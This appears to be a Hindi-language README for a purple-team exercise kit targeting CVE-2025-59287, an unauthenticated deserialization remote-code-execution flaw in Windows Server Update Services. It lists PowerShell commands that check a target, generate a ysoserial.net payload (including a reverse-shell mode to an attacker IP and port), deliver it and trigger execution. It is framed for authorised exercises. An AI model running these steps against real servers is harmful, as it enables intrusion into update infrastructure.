
बैंगनी टीम अभ्यास स्क्रिप्ट जो CVE-2025-59287 का प्रदर्शन करती हैं, जो WSUS डेटाबेस में दुर्भावनापूर्ण deserialization पेलोड इंजेक्शन के माध्यम से WSUS में एक अनप्रमाणित RCE है।
CVE-2025-59287 के लिए पर्पल टीम अभ्यास स्क्रिप्ट, जो Windows Server Update Services (WSUS) में बिना प्रमाणीकरण के रिमोट कोड निष्पादन भेद्यता है।
केवल अधिकृत उपयोग। केवल नियंत्रित अभ्यास वातावरण में उन सिस्टमों के विरुद्ध उपयोग के लिए जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास है।
यह भेद्यता अनाम रूप से सुलभ WSUS SOAP एंडपॉइंट्स का दुरुपयोग करके WSUS डेटाबेस में एक दुर्भावनापूर्ण deserialization पेलोड इंजेक्ट करती है। पेलोड तब निष्पादित होता है जब WSUS प्रशासनिक कंसोल खोला जाता है या सिंक ट्रिगर किया जाता है।
8530 पर WSUS तक नेटवर्क पहुंचysoserial\Release\ फ़ोल्डर में ysoserial.net रखा गया हो (सेटअप देखें)wsus-cve-2025-59287/
├── 1-check.ps1 # Verify target is vulnerable
├── 2-generate.ps1 # Generate serialized payload blob
├── 3-deliver.ps1 # Deliver payload to WSUS server
├── 4-verify.ps1 # Verify execution and clean up
├── ysoserial/ # Place ysoserial.net release here (not committed)
│ └── Release/
│ └── ysoserial.exe
└── README.md
रिपॉजिटरी को क्लोन करें या डाउनलोड करें। ysoserial.net को इस प्रकार जोड़ें कि पथ ysoserial\Release\ysoserial.exe से मेल खाए।
ysoserial.net यहाँ से डाउनलोड करें: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 यह डिफ़ॉल्ट रूप से Windows Defender को ट्रिगर करेगा
सभी स्क्रिप्ट्स को रिपॉजिटरी रूट से चलाएँ।
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"
फ़ाइल ड्रॉप (कोई लिसनर आवश्यक नहीं, पहले अनुशंसित):
.\2-generate.ps1 -Mode filedrop
रिवर्स शेल:
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"
WSUS सर्वर पर प्रशासनिक कंसोल को Start > Windows Server Update Services के माध्यम से खोलें, या PowerShell के माध्यम से सिंक ट्रिगर करें:
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()
निष्पादन सत्यापित करें:
.\4-verify.ps1
सभी आर्टिफैक्ट्स सत्यापित करें और साफ़ करें:
.\4-verify.ps1 -Cleanup
अटैक बॉक्स से एडमिन शेयर के माध्यम से:
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup
सफाई के बाद अभ्यास कंप्यूटर को WSUS कंसोल में Computers के अंतर्गत से हटा दें।